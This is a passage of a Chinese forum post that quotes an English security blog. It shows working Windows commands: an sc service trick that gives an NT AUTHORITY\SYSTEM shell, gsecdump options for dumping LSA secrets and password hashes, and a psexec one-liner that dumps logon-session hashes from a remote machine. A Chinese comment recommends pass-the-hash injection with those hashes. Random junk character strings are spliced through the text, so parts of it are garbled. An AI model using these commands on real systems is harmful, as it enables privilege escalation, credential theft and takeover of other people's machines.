o get a DOS Prompt as NT system:
, m u1 i" ?; I0 i1 E9 _( b
/ f) E# m( C( P) m7 G0 ^C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact# R. E0 S+ {* y8 M
[SC] CreateService SUCCESS
0 {7 x( C% x. X! }& _5 \% \0 C3 H) [- Q& g
C:\>sc start shellcmdline
9 D' p+ U. ]# g# _4 }2 N[SC] StartService FAILED 1053:9 c/ D; A: I& z; b/ H* s
7 |5 j3 r" m' o/ }; r9 C
The service did not respond to the start or control request in a timely fashion.
* ~4 k$ A) R' w) D k/ m' u
: |: }& N2 T! [& P8 }& xC:\>sc delete shellcmdline! [$ S4 h) ^3 N- A# \
[SC] DeleteService SUCCESS! h& N! {$ T5 N# e m' S
6 U6 |& l7 B5 p! e5 U" p
------------
7 {5 C$ }6 `& [* F% @1 G4 K8 X/ Q5 g0 G, x2 X5 d- @& m6 r& ?
Then in the new DOS window:. ~0 e' g/ ~. f% e3 t
) h- ]4 o; W# r6 B) W- y, c* JMicrosoft Windows XP [Version 5.1.2600]
: k' M* V! y; w. Y(C) Copyright 1985-2001 Microsoft Corp.2 X. U+ i0 z* m! N
! V; m9 n s. N9 h5 |- U
C:\WINDOWS\system32>whoami
$ o) }8 Q2 O) A4 }NT AUTHORITY\SYSTEM
9 V2 D' a/ C3 p! B5 d6 {$ ^ _7 E) N9 w: v3 ^' T: N3 h) I$ U
C:\WINDOWS\system32>gsecdump -h
: t3 ^: z, ~$ A& `* J0 P8 z/ pgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
3 F2 z4 g' q( u0 M0 Y, yusage: gsecdump [options]
/ T" F7 W$ x: \% g9 N1 x
8 [8 _" k8 ]* P' k' soptions:
" {7 \, \7 Z' C0 W) Y% }1 n-h [ --help ] show help& [# _1 U( O; J% ?8 ?9 r+ j `
-a [ --dump_all ] dump all secrets
* | \* [ i" r3 ~2 Z-l [ --dump_lsa ] dump lsa secrets* j( B+ P/ b6 h% Y3 m; h9 w k0 ~
-w [ --dump_wireless ] dump microsoft wireless connections$ W7 O/ v3 D& ~4 _
-u [ --dump_usedhashes ] dump hashes from active logon sessions* c+ d4 u) o% \& Z& O
-s [ --dump_hashes ] dump hashes from SAM/AD5 A5 d u) h/ e$ Z& b
M) ?. _; H9 c" `/ ]2 Y4 M# Z
Although I like to use:" W2 v& v/ x3 @5 l6 X
) D# R; z. {1 |* J; f: CPsExec v1.83 - Execute processes remotely& q6 T e7 k" {& Z ^
Copyright (C) 2001-2007 Mark Russinovich% D8 e1 x" z% U
Sysinternals - 链接标记[url]www.sysinternals.com[/url]9 r F- ~5 ^2 S' j4 q- B! i
4 N% a# x' r/ \$ h3 nC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
. B! q* ~6 K0 l% ]/ Q4 d2 B; d9 S( | f7 u9 X
to get the hashes from active logon sessions of a remote system.
; }- S3 _2 C2 X8 X; s6 X9 H" R5 D7 t Y
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
- U$ h: \# f* c7 f' `' N- x
! ?2 E# I- O7 \- \6 r0 o1 K: a提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.( D; W4 j# t1 J6 g
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]) S$ S+ h4 @; [5 \1 o! w7 K
6 q S' q6 J, N; s/ F" _- m
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。: f3 f# U; Q1 M* L4 _; W, h6 ]. f
|
发表于 2012-11-6 21:09:29
收藏
支持
反对